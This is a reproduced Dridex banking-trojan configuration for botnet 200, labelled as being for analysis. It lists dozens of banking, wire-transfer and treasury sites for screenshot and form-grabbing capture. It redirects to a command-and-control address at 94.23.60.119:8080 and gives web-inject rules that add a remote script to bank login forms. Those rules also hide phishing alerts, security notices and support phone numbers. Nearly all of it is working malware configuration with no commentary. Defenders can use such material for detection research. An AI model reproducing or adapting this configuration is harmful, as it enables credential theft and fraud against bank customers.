Dridex bot 200 settings

1. Dridex botnet 200 settings for analysis purposes:
2. <settings hash="8b355a535e9aab6e3812eada9769464fed8f2e08">
3. <httpblock>
4. <url type="allow">wex8\.suntrust\.com</url>
5. <url type="allow">www7\.suntrust\.com</url>
6. <url type="allow">pane\.bankofamerica\.com</url>
7. <url type="allow">www\.amegybank\.com/metrics</url>
8. <url type="allow">www2\.citibank\.citigroup\.com</url>
9. <url type="allow">images\.citibank\.citigroup\.com</url>
10. <url type="allow">www7\.compassbank\.com</url>
11. <url type="allow">www\.u43\.pnc\.com</url>
12. <url type="allow">cdn2\.svbconnect\.com</url>
13. <url type="allow">portal\.accountonline\.com</url>
14. <url type="allow">ww7\.whitneybank\.com</url>
15. <url type="allow">www8\.firstcitizensonline\.com</url>
16. <url type="allow">olbb2pp\.bmo\.com</url>
17. <url type="allow">www2\.americafirst\.com</url>
18. <url type="allow">cdn\.first\-online\.com</url>
19. <url type="allow">img3\.moneygram\.com</url>
20. <url type="allow">securentrycorp\.zionsbank\.com/metrics</url>
21. <url type="allow">ground\.citi\.com</url>
22. <url type="allow">www9\.firstcitizens\.com</url>
23. <url type="allow">www7\.hwtreasurysolution\.com</url>
24. <url type="allow">.*\.sessioncam\.com</url>
25. <url type="allow">www\.treasury\.pncbank\.com/tmmps</url>
26. <url type="allow">assets\.adobedtm\.com</url>
27. <url type="allow">analytics\.pnc\.com</url>
28. <url type="allow">.*\.doubleclick\.net</url>
29. <url type="allow">.*\.atdmt\.com</url>
30. <url type="allow">.*\.mathtag\.com</url>
31. <url type="allow">.*\.rubiconproject\.com</url>
32. <url type="allow">.*\.pubmatic\.com</url>
33. <url type="allow">.*\.bluekai\.com</url>
34. </httpblock>
35. <httpshots>
36. <url type="deny" onget="1" onpost="1">\.(gif|png|jpg|css|swf|ico|js)($|\?)</url>
37. <url type="deny" onget="1" onpost="1">(resource\.axd|yimg\.com)</url>
38. <url type="allow" onpost="1" onget="1">\.com/k1/</url>
39. <url type="allow" onpost="1" onget="1">/authentication/zbf/k/</url>
40. <url type="allow" onpost="1" onget="1">/bb/logon/</url>
41. <url type="allow" onpost="1" onget="1">/cashman/</url>
42. <url type="allow" onpost="1" onget="1">/cashplus/</url>
43. <url type="allow" onpost="1" onget="1">/clkccm/</url>
44. <url type="allow" onpost="1" onget="1">/cmmain\.cfm</url>
45. <url type="allow" onpost="1" onget="1">/cmserver/</url>
46. <url type="allow" onpost="1" onget="1">/cmwire</url>
47. <url type="allow" onpost="1" onget="1">achredirect\.aspx</url>
48. <url type="allow" onpost="1" onget="1">cbonline</url>
49. <url type="allow" onpost="1" onget="1">/ebc_ebc1961/</url>
50. <url type="allow" onpost="1" onget="1">/ibs\.</url>
51. <url type="allow" onpost="1" onget="1">/loginolb/loginolb</url>
52. <url type="allow" onpost="1" onget="1">/olbb/</url>
53. <url type="allow" onpost="1" onget="1">/sbuser/</url>
54. <url type="allow" onpost="1" onget="1">/smallbiz/</url>
55. <url type="allow" onpost="1" onget="1">/wcmpw/</url>
56. <url type="allow" onpost="1" onget="1">/webcm/</url>
57. <url type="allow" onpost="1" onget="1">/wire/</url>
58. <url type="allow" onpost="1" onget="1">/wires/</url>
59. <url type="allow" onpost="1" onget="1">access\.jpmorgan\.com</url>
60. <url type="allow" onpost="1" onget="1">access\.usbank\.com</url>
61. <url type="allow" onpost="1" onget="1">accessbankplc\.com</url>
62. <url type="allow" onpost="1" onget="1">accountoverview\.aspx</url>
63. <url type="allow" onpost="1" onget="1">accurint\.com</url>
64. <url type="allow" onpost="1" onget="1">achieveaccess\.citizensbank\.com</url>
65. <url type="allow" onpost="1" onget="1">achpayment</url>
66. <url type="allow" onpost="1" onget="1">achweb\.unionbank\.com</url>
67. <url type="allow" onpost="1" onget="1">achworks\.com</url>
68. <url type="allow" onpost="1" onget="1">alltimetreasury\.pacificcapitalbank\.com</url>
69. <url type="allow" onpost="1" onget="1">amegybank\.com/</url>
70. <url type="allow" onpost="1" onget="1">atbonlinebusiness\.com</url>
71. <url type="allow" onpost="1" onget="1">auth\.umb\.com</url>
72. <url type="allow" onpost="1" onget="1">authmaster\.nationalcity\.com</url>
73. <url type="allow" onpost="1" onget="1">bankofbermuda\.com</url>
74. <url type="allow" onpost="1" onget="1">billauth</url>
75. <url type="allow" onpost="1" onget="1">billmenu</url>
76. <url type="allow" onpost="1" onget="1">blilk</url>
77. <url type="allow" onpost="1" onget="1">bmo\.com/</url>
78. <url type="allow" onpost="1" onget="1">bmoharrisprivatebankingonline\.com</url>
79. <url type="allow" onpost="1" onget="1">bmomutualfunds\.com</url>
80. <url type="allow" onpost="1" onget="1">bnycash\.bankofny\.com</url>
81. <url type="allow" onpost="1" onget="1">business\.macu\.com</url>
82. <url type="allow" onpost="1" onget="1">business\.netbankerplus\.com</url>
83. <url type="allow" onpost="1" onget="1">businessaccess\.citibank\.citigroup\.com</url>
84. <url type="allow" onpost="1" onget="1">businessappshome</url>
85. <url type="allow" onpost="1" onget="1">businessclassonline\.compassbank\.com</url>
86. <url type="allow" onpost="1" onget="1">businesslogin</url>
87. <url type="allow" onpost="1" onget="1">businessportal\.mibank\.com</url>
88. <url type="allow" onpost="1" onget="1">bxs\.com</url>
89. <url type="allow" onpost="1" onget="1">cashanalyzer\.com</url>
90. <url type="allow" onpost="1" onget="1">cashmanager\.mizuhoe\-treasurer\.com</url>
91. <url type="allow" onpost="1" onget="1">cashmgmt</url>
92. <url type="allow" onpost="1" onget="1">cashmgt</url>
93. <url type="allow" onpost="1" onget="1">bankofamerica\.com</url>
94. <url type="allow" onpost="1" onget="1">cashproweb\.com/cpwportal</url>
95. <url type="allow" onpost="1" onget="1">cbbusinessonline\.com</url>
96. <url type="allow" onpost="1" onget="1">cfgbusinessaccess\.com</url>
97. <url type="allow" onpost="1" onget="1">checkgateway</url>
98. <url type="allow" onpost="1" onget="1">chaseonline\.chase\.com/MyAccounts\.aspx</url>
99. <url type="allow" onpost="1" onget="1">cib\.bankofthewest</url>
100. <url type="allow" onpost="1" onget="1">citizensbankmoneymanagergps\.com</url>
101. <url type="allow" onpost="1" onget="1">cmachm\.w</url>
102. <url type="allow" onpost="1" onget="1">cmbmnt\.w</url>
103. <url type="allow" onpost="1" onget="1">cmol\.bbt\.com/auth</url>
104. <url type="allow" onpost="1" onget="1">cmwirp\.w</url>
105. <url type="allow" onpost="1" onget="1">cnbsec1\.</url>
106. <url type="allow" onpost="1" onget="1">colb\.</url>
107. <url type="allow" onpost="1" onget="1">commercebusinessdirect\.com</url>
108. <url type="allow" onpost="1" onget="1">commercial\.wachovia\.com</url>
109. <url type="allow" onpost="1" onget="1">commercialservices</url>
110. <url type="allow" onpost="1" onget="1">connect\.bankcolonial\.com</url>
111. <url type="allow" onpost="1" onget="1">connect\.colonialbank\.com</url>
112. <url type="allow" onpost="1" onget="1">constitutioncorp\.org</url>
113. <url type="allow" onpost="1" onget="1">corpach</url>
114. <url type="allow" onpost="1" onget="1">corporate\.epfc\.com</url>
115. <url type="allow" onpost="1" onget="1">corporateaccounts</url>
116. <url type="allow" onpost="1" onget="1">corporatebankingweb</url>
117. <url type="allow" onpost="1" onget="1">corporateconnect\.net</url>
118. <url type="allow" onpost="1" onget="1">corpower\.coop</url>
119. <url type="allow" onpost="1" onget="1">createcorpwire</url>
120. <url type="allow" onpost="1" onget="1">createwire</url>
121. <url type="allow" onpost="1" onget="1">ebanking\-services</url>
122. <url type="allow" onpost="1" onget="1">ecash\.</url>
123. <url type="allow" onpost="1" onget="1">ecm\-transfers\.unionbank\.com</url>
124. <url type="allow" onpost="1" onget="1">ecms\.unionbank\.com</url>
125. <url type="allow" onpost="1" onget="1">efirstbank\.com</url>
126. <url type="allow" onpost="1" onget="1">enternetbank\.com</url>
127. <url type="allow" onpost="1" onget="1">express\.53\.com</url>
128. <url type="allow" onpost="1" onget="1">expressdeposit\.colonialbank\.com</url>
129. <url type="allow" onpost="1" onget="1">fbmedirect\.com</url>
130. <url type="allow" onpost="1" onget="1">ffinonline\.com</url>
131. <url type="allow" onpost="1" onget="1">firstbancorp\.com</url>
132. <url type="allow" onpost="1" onget="1">firstbanks\.com</url>
133. <url type="allow" onpost="1" onget="1">fnfgbusinessonline\.enterprisebanker\.com</url>
134. <url type="allow" onpost="1" onget="1">fxpayments\.americanexpress\.com</url>
135. <url type="allow" onpost="1" onget="1">goldleaf</url>
136. <url type="allow" onpost="1" onget="1">hbcash\.exe</url>
137. <url type="allow" onpost="1" onget="1">hblibank\.com</url>
138. <url type="allow" onpost="1" onget="1">hbproxy\.exe</url>
139. <url type="allow" onpost="1" onget="1">ibbpl2\.com</url>
140. <url type="allow" onpost="1" onget="1">ibbpowerlink\.com</url>
141. <url type="allow" onpost="1" onget="1">ibbusinessnet\.com</url>
142. <url type="allow" onpost="1" onget="1">inetbanker</url>
143. <url type="allow" onpost="1" onget="1">internationalbanking\.</url>
144. <url type="allow" onpost="1" onget="1">internationalpayments\.</url>
145. <url type="allow" onpost="1" onget="1">internet\-ebanking\.com</url>
146. <url type="allow" onpost="1" onget="1">itreasury\.amsouth\.com</url>
147. <url type="allow" onpost="1" onget="1">ktt\.key\.com</url>
148. <url type="allow" onpost="1" onget="1">lakelandbank\.com</url>
149. <url type="allow" onpost="1" onget="1">libertymutualbusinessdirect\.com</url>
150. <url type="allow" onpost="1" onget="1">lionbank\.com</url>
151. <url type="allow" onpost="1" onget="1">login_business\.asp</url>
152. <url type="allow" onpost="1" onget="1">logincm</url>
153. <url type="allow" onpost="1" onget="1">mcb\-home\.com/online</url>
154. <url type="allow" onpost="1" onget="1">memberach</url>
155. <url type="allow" onpost="1" onget="1">metrobankdirect\.com</url>
156. <url type="allow" onpost="1" onget="1">midatlanticcorp\.org</url>
157. <url type="allow" onpost="1" onget="1">moneymanagergps\.com</url>
158. <url type="allow" onpost="1" onget="1">olb\.ent\.com/business/</url>
159. <url type="allow" onpost="1" onget="1">online\.1stnb\.com</url>
160. <url type="allow" onpost="1" onget="1">onlineaccess1\.com</url>
161. <url type="allow" onpost="1" onget="1">onlinebanking\.1stunitedbankfl\.com</url>
162. <url type="allow" onpost="1" onget="1">onlinebanking\.banksterling\.com</url>
163. <url type="allow" onpost="1" onget="1">onlinencr\.com</url>
164. <url type="allow" onpost="1" onget="1">onlineserv/cm/</url>
165. <url type="allow" onpost="1" onget="1">otm\.suntrust\.com</url>
166. <url type="allow" onpost="1" onget="1">pacificenterprisebank\.com</url>
167. <url type="allow" onpost="1" onget="1">passport\.texascapitalbank\.com</url>
168. <url type="allow" onpost="1" onget="1">pastabanka\.lv</url>
169. <url type="allow" onpost="1" onget="1">paylinks\.cunet\.org</url>
170. <url type="allow" onpost="1" onget="1">payroll\.faces</url>
171. <url type="allow" onpost="1" onget="1">pres_wa_wires</url>
172. <url type="allow" onpost="1" onget="1">rbs_commercial</url>
173. <url type="allow" onpost="1" onget="1">royalbank\.com/cgi\-bin/rbaccess</url>
174. <url type="allow" onpost="1" onget="1">rsagoidauthentication</url>
175. <url type="allow" onpost="1" onget="1">secure\-banking</url>
176. <url type="allow" onpost="1" onget="1">secure\-eccu\.org</url>
177. <url type="allow" onpost="1" onget="1">secure\-nvboh\.com/</url>
178. <url type="allow" onpost="1" onget="1">secure\.1stfedbank\.com</url>
179. <url type="allow" onpost="1" onget="1">secure\.ally\.com</url>
180. <url type="allow" onpost="1" onget="1">secure\.bancinternetgroup\.com</url>
181. <url type="allow" onpost="1" onget="1">secure\.fundsxpress\.com</url>
182. <url type="allow" onpost="1" onget="1">secureport\.texascapitalbank\.com</url>
183. <url type="allow" onpost="1" onget="1">server14\.cey\-ebanking\.com</url>
184. <url type="allow" onpost="1" onget="1">singlepoint\.usbank\.com</url>
185. <url type="allow" onpost="1" onget="1">suntrust\.omniasp\.com</url>
186. <url type="allow" onpost="1" onget="1">svbconnect</url>
187. <url type="allow" onpost="1" onget="1">swifttransfer</url>
188. <url type="allow" onpost="1" onget="1">tabbank\.com</url>
189. <url type="allow" onpost="1" onget="1">tdcommercialbanking</url>
190. <url type="allow" onpost="1" onget="1">treas\-mgt\.frostbank\.com</url>
191. <url type="allow" onpost="1" onget="1">treasury\.pncbank\.com</url>
192. <url type="allow" onpost="1" onget="1">treasury\.wamu\.com</url>
193. <url type="allow" onpost="1" onget="1">treasurydirect\.tdbank\.com</url>
194. <url type="allow" onpost="1" onget="1">treasurylinkweb\.com</url>
195. <url type="allow" onpost="1" onget="1">treasurypathways\.com</url>
196. <url type="allow" onpost="1" onget="1">treasuryservices\.banknow\.texascapitalbank\.com</url>
197. <url type="allow" onpost="1" onget="1">trz\.tranzact\.org</url>
198. <url type="allow" onpost="1" onget="1">usgateway2\.rbs\.com</url>
199. <url type="allow" onpost="1" onget="1">^https.+usaa\.com</url>
200. <url type="allow" onpost="1" onget="1">wblnk\.</url>
201. <url type="allow" onpost="1" onget="1">wcma\.businesscenter\.ml\.com/bcprivate/asp/wcmaloginea\.aspx</url>
202. <url type="allow" onpost="1" onget="1">wcmfd/wcmpw</url>
203. <url type="allow" onpost="1" onget="1">web\-access</url>
204. <url type="allow" onpost="1" onget="1">web\.accessor\.com</url>
205. <url type="allow" onpost="1" onget="1">webbankingforbusiness\.mandtbank\.com</url>
206. <url type="allow" onpost="1" onget="1">webcash</url>
207. <url type="allow" onpost="1" onget="1">webcashmgmt\.com</url>
208. <url type="allow" onpost="1" onget="1">webexpress</url>
209. <url type="allow" onpost="1" onget="1">weblink\.websterbank\.com</url>
210. <url type="allow" onpost="1" onget="1">wiretransfer</url>
211. <url type="allow" onpost="1" onget="1">^https.+schwab\.com</url>
212. <url type="allow" onpost="1" onget="1">^https.+key\.com</url>
213. <url type="allow" onpost="1" onget="1">^https.+vanguard\.com</url>
214. <url type="allow" onpost="1" onget="1">^https.+etrade\.com</url>
215. <url type="allow" onpost="1" onget="1">^https.+pnc\.com</url>
216. </httpshots>
217. <formgrabber>
218. <url type="deny">\.(swf)($|\?)</url>
219. <url type="deny">/isapi/ocget.dll</url>
220. <url type="allow">^https?://aol.com/.*/login/</url>
221. <url type="allow">^https?://accounts.google.com/ServiceLogin</url>
222. <url type="allow">^https?://login.yahoo.com/</url>
223. <url type="allow">^https?://login.live.com/</url>
224. <url type="deny">^https?://(\w+\.)?aol.com</url>
225. <url type="deny">^https?://(\w+\.)?facebook.com/</url>
226. <url type="deny">^https?://(\w+\.)?google</url>
227. <url type="deny">^https?://(\w+\.)?yahoo</url>
228. <url type="deny">^https?://(\w+\.)?youtube.com</url>
229. <url type="deny">^https?://(\w+\.)?live.com</url>
230. <url type="deny">^https?://(\w+\.)?twitter.com</url>
231. <url type="deny">^https?://(\w+\.)?vk.com</url>
232. <url type="deny">^https.*ocsp\..+$</url>
233. <url type="deny">^https.*safebrowsing\..+$</url>
234. <url type="deny">^https?://fhr\.data\.mozilla\.com</url>
235. <url type="deny">^https://s.*\.symcd\.com</url>
236. <url type="deny">^https://s.*\.symcb\.com</url>
237. <url type="deny">^https.*ocsp2\..+$</url>
238. <url type="deny">^https://localhost.+skypectoc/.+$</url>
239. <url type="deny">\.messenger\.live\.com</url>
240. <url type="deny">pipe\.skype\.com</url>
241. <url type="deny">\.lphbs\.com</url>
242. <url type="deny">ocsp\.digicert\.com</url>
243. <url type="deny">txtsrving\.info</url>
244. <url type="deny">zynga\.com</url>
245. <url type="deny">yahoo\.com</url>
246. <url type="deny">pnrws\.skype\.com</url>
247. <url type="deny">netflix\.com</url>
248. <url type="deny">bluecava\.com</url>
249. <url type="deny">liverail\.com </url>
250. <url type="deny">bing\.com</url>
251. <url type="deny">\.optimatic\.com</url>
252. <url type="deny">hiro\.tv</url>
253. <url type="deny">spotxchange\.com</url>
254. <url type="deny">nielsen\.com</url>
255. <url type="deny">mapquest\.com </url>
256. <url type="deny">^https://.+\.skype\.com/api/</url>
257. <url type="deny">(//|\.)lphbs.com</url>
258. <url type="deny">(//|\.)zynga.com</url>
259. </formgrabber>
260. <redirects>
261. <redirect name="1st" vnc="0" socks="0" uri="http://94.23.60.119:8080/staticstat" timeout="20">statsgatherr.js</redirect>
262. <redirect name="2nd" vnc="1" socks="1" uri="http://94.23.60.119:8080/tickerlive" timeout="20">statticker2.js</redirect>
263. </redirects>
264. <httpinjects>
265. <httpinject>
266. <conditions>
267. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://eadibcorp\.adib\.ae/cb/servlet/cb/jsp\-ns/login\.jsp</url>
268. </conditions>
269. <actions>
270. <modify>
271. <pattern modifiers="i"><![CDATA["><p align="justify"]]></pattern>
272. <replacement><![CDATA[display:none;"><p align="justify"]]></replacement>
273. </modify>
274. <modify>
275. <pattern modifiers="i"><![CDATA[Customer Service: <span dir="ltr">.*</span>]]></pattern>
276. <replacement><![CDATA[]]></replacement>
277. </modify>
278. <modify>
279. <pattern modifiers="i"><![CDATA[(td valign="middle" class="columndata" style="padding-left:30px;)]]></pattern>
280. <replacement><![CDATA[\1display:none;]]></replacement>
281. </modify>
282. </actions>
283. </httpinject>
284. <httpinject>
285. <conditions>
286. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://eadibcorp\.adib\.ae/cb/servlet/cb/jsp\-ns/login2\.jsp</url>
287. </conditions>
288. <actions>
289. <modify>
290. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
291. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
292. </modify>
293. </actions>
294. </httpinject>
295. <httpinject>
296. <conditions>
297. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://fiepay\.mashreqbank\.com/Login\.asp</url>
298. </conditions>
299. <actions>
300. <modify>
301. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
302. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
303. </modify>
304. <modify>
305. <pattern modifiers="i"><![CDATA[(href="SecurityAlert\.htm")]]></pattern>
306. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
307. </modify>
308. </actions>
309. </httpinject>
310. <httpinject>
311. <conditions>
312. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://banking\.mashreqbank\.com/FID/login\.aspx</url>
313. </conditions>
314. <actions>
315. <modify>
316. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
317. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
318. </modify>
319. <modify>
320. <pattern modifiers="i"><![CDATA[(id="ContactTable")]]></pattern>
321. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
322. </modify>
323. </actions>
324. </httpinject>
325. <httpinject>
326. <conditions>
327. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://netbanking\.mashreqbank\.com/EntlWeb/IbsJsps/orbilogin\.jsp</url>
328. </conditions>
329. <actions>
330. <modify>
331. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
332. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
333. </modify>
334. </actions>
335. </httpinject>
336. <httpinject>
337. <conditions>
338. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://netbanking\.mashreqbank\.com/B001/SMELogin\.jsp</url>
339. </conditions>
340. <actions>
341. <modify>
342. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
343. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
344. </modify>
345. <modify>
346. <pattern modifiers="i"><![CDATA[<span class="text-1"><i class="icon-ok"></i> Need assistance call <span>.*</span></span>]]></pattern>
347. <replacement><![CDATA[]]></replacement>
348. </modify>
349. </actions>
350. </httpinject>
351. <httpinject>
352. <conditions>
353. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://rakbankonline\.ae/corp/BANKAWAY(;|\?|$)</url>
354. </conditions>
355. <actions>
356. <modify>
357. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
358. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
359. </modify>
360. <modify>
361. <pattern modifiers="i"><![CDATA[( class="trouble")]]></pattern>
362. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
363. </modify>
364. <modify>
365. <pattern modifiers="i"><![CDATA[( class="disclaimer")]]></pattern>
366. <replacement><![CDATA[\1 style="display:none;"]]></replacement>
367. </modify>
368. </actions>
369. </httpinject>
370. <httpinject>
371. <conditions>
372. <url type="allow" onpost="1" onget="1" modifiers="">^https://bnycash\.bankofny\.com/$</url>
373. </conditions>
374. <actions>
375. <modify>
376. <pattern modifiers="Ui"><![CDATA[(</form>)]]></pattern>
377. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
378. </modify>
379. </actions>
380. </httpinject>
381. <httpinject>
382. <conditions>
383. <url type="allow" onpost="1" onget="1" modifiers="U">^https://cmol\.bbt\.com/auth/prompt\.tb</url>
384. </conditions>
385. <actions>
386. <modify>
387. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
388. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
389. </modify>
390. <modify>
391. <pattern modifiers="Ums"><![CDATA[<strong>Security</strong>.*<p class="errortext">(?<inject>.*)</p>]]></pattern>
392. <replacement />
393. </modify>
394. </actions>
395. </httpinject>
396. <httpinject>
397. <conditions>
398. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\d*\.bmo\.com/ctpauth/CTPEAILogin/CustUserPasswordAuthServlet($|\?)</url>
399. </conditions>
400. <actions>
401. <modify>
402. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
403. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
404. </modify>
405. </actions>
406. </httpinject>
407. <httpinject>
408. <conditions>
409. <url type="allow" onpost="1" onget="1" modifiers="U">^https://w\d+\.businessbanking\.cibc\.com/logon\.jsp($|\?|\;)</url>
410. </conditions>
411. <actions>
412. <modify>
413. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
414. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
415. </modify>
416. </actions>
417. </httpinject>
418. <httpinject>
419. <conditions>
420. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\d*.royalbank.com/cgi-bin/rbaccess/(rbcgi|rbunxcgi\?.+=ClientSignin)</url>
421. <url type="allow" onpost="1" onget="1" modifiers="U">^https://easywebcpo\.td\.com/waw/idp/login\.htm</url>
422. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.cibconline\.cibc\.com/olbtxn/authentication/.+\.cibc($|\?.*)</url>
423. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\d*\.bmo\.com/cgi\-bin/netbnx/NBmain($|\?)</url>
424. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.bmomutualfunds\.com/(|cfm/Holdings)$</url>
425. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://www\d*\.bmoharrisprivatebankingonline\.com/Client/DFSignIn/DFLogin\.aspx($|\?)</url>
426. <url type="allow" onpost="1" onget="1" modifiers="Ui">^https://[1-9a-z\.\-]+\.web\-access\.com/.*(login|welcome|auth).*\.cgi</url>
427. <url type="allow" onpost="1" onget="1" modifiers="U">^https://webinfocus\.mandtbank\.com/mandt/cgi\-bin/.*(login|welcome|auth).*\.cgi</url>
428. <url type="allow" onpost="1" onget="1" modifiers="">^https://towernet\.capitalonebank\.com/.*login.*\.(cgi|html)</url>
429. <url type="allow" onpost="1" onget="1" modifiers="i">^https://webbankingforbusiness\.mandtbank\.com/(|SBBSignOn\.aspx)(\?|$)</url>
430. <url type="allow" onpost="1" onget="1" modifiers="">^https://banking\.calbanktrust\.com/iLogin\.jsp(\?|$)</url>
431. <url type="allow" onpost="1" onget="1" modifiers="i">^https://onlinebanking\.banksterling\.com/login2.asp(\?|$)</url>
432. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.enternetbank\.com/TESrvAuth\?.*laf=exact4web</url>
433. <url type="allow" onpost="1" onget="1" modifiers="">^https://(www\.|)ibbpowerlink\.com/fotrd/login\.jsp(\?|$)</url>
434. <url type="allow" onpost="1" onget="1" modifiers="i">^https://bolb\-(west|east)\.associatedbank\.com/(|Security/Password\.aspx)(\?|$)</url>
435. <url type="allow" onpost="1" onget="1" modifiers="">^https://vpn\d*\.sandyspringbank\.com/\+CSCOE\+/logon\.html(\?|$)</url>
436. <url type="allow" onpost="1" onget="1" modifiers="i">^https://(www\.|)mbachexpress\.com/Inductor/Login\.aspx(\?|$)</url>
437. <url type="allow" onpost="1" onget="1" modifiers="i">^https://ifxmanager\.bnymellon\.com/pw/pwserv/smpwservicescgi\.exe\?</url>
438. <url type="allow" onpost="1" onget="1" modifiers="i">^https://www\.nashvillecitizensbank\.com/olbb/(|login\.asp)(\?|$)</url>
439. <url type="allow" onpost="1" onget="1" modifiers="i">^https://cbs\.firstcitizens\.com/cb/servlet/cb/loginfcbnc\.jsp(\?|$)</url>
440. <url type="allow" onpost="1" onget="1" modifiers="">^https://achieveaccess\.citizensbank\.com/exchange/(\?|$)</url>
441. <url type="allow" onpost="1" onget="1" modifiers="i">^https://.+/Common/SignOn/Start\.asp$</url>
442. <url type="allow" onpost="1" onget="1" modifiers="U">^https://(www\.|)scotiaonline\.scotiabank\.com/online/start\.jsp(\?|$)</url>
443. <url type="allow" onpost="1" onget="1" modifiers="">^https://banking\.firsttennessee\.biz/servlet/ftb/index.html(\?|$)</url>
444. <url type="allow" onpost="1" onget="1" modifiers="">^https://businessclassonline\.compassbank\.com/fi\d+\_Banking/bb/logon(\?|$)</url>
445. </conditions>
446. <actions>
447. <modify>
448. <pattern modifiers=""><![CDATA[(</(head|HEAD) *>)]]></pattern>
449. <replacement><![CDATA[<link rel="stylesheet" href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.11/themes/hot-sneaks/jquery-ui.css" type="text/css"/>\1]]></replacement>
450. </modify>
451. <modify>
452. <pattern modifiers="ms"><![CDATA[(.*)(</(form|FORM|body|BODY) *?>)]]></pattern>
453. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\2]]></replacement>
454. </modify>
455. </actions>
456. </httpinject>
457. <httpinject>
458. <conditions>
459. <url type="allow" onpost="1" onget="1" modifiers="">^https://cbs\.fidelitybanknc\.com/cb/servlet/cb/loginfcbnc\.jsp(\?|$)</url>
460. </conditions>
461. <actions>
462. <modify>
463. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
464. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
465. </modify>
466. </actions>
467. </httpinject>
468. <httpinject>
469. <conditions>
470. <url type="allow" onpost="1" onget="1" modifiers="U">^https://treas\-mgt\.frostbank\.com/rdp/cgi\-bin/[a-zA-z]+\.cgi</url>
471. </conditions>
472. <actions>
473. <modify>
474. <pattern modifiers="imsU"><![CDATA[(name="login\_form".+</form>)]]></pattern>
475. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
476. </modify>
477. </actions>
478. </httpinject>
479. <httpinject>
480. <conditions>
481. <url type="allow" onpost="1" onget="1" modifiers="U">^https://www\.hsbc\.ca/1/2/</url>
482. </conditions>
483. <actions>
484. <modify>
485. <pattern modifiers="i"><![CDATA[(</body>)]]></pattern>
486. <replacement><![CDATA[<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>\1]]></replacement>
487. </modify>
488. </actions>
489. </httpinject>
490. <httpinject>
491. <conditions>
492. <url type="allow" onpost="1" onget="1" modifiers="">^https://secure\.rabobank\.com/Gateway/offlineloginpage\.html(\?|$)</url>
493. </conditions>
494. <actions>
495. <modify>
496. <pattern modifiers=""><![CDATA[(</FORM>)]]></pattern>
497. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
498. </modify>
499. </actions>
500. </httpinject>
501. <httpinject>
502. <conditions>
503. <url type="allow" onpost="1" onget="1" modifiers="">^https://www\.citibusiness\.citibank\.com\.sg/SGCBZ/JSO/signon/DisplayCinSignon\.do(\?|$)</url>
504. </conditions>
505. <actions>
506. <modify>
507. <pattern modifiers="sA"><![CDATA[(.+</form>)]]></pattern>
508. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
509. </modify>
510. <modify>
511. <pattern modifiers="sA"><![CDATA[.+(?<inject><b>PHISHING ALERT</b>.+?</font>.+?)</font>]]></pattern>
512. <replacement />
513. </modify>
514. </actions>
515. </httpinject>
516. <httpinject>
517. <conditions>
518. <url type="allow" onpost="1" onget="1" modifiers="">^https://usgateway\d*\.rbs\.com/wps/portal/cb/applications.*MoneyManagerGps</url>
519. </conditions>
520. <actions>
521. <modify>
522. <pattern modifiers=""><![CDATA[(</form>)]]></pattern>
523. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
524. </modify>
525. </actions>
526. </httpinject>
527. <httpinject>
528. <conditions>
529. <url type="allow" onpost="1" onget="1" modifiers="i">^https://(www\.|)securenetbanking\.ca/(IBClient/loginCorp|IBRetail/loginbusiness)\.aspx(\?|$)</url>
530. </conditions>
531. <actions>
532. <modify>
533. <pattern modifiers="i"><![CDATA[(</form>)]]></pattern>
534. <replacement><![CDATA[\1<script type="text/javascript" language="JavaScript" src="scripts/statticker2.js"></script>]]></replacement>
535. </modify>
536. </actions>
537. </httpinject>
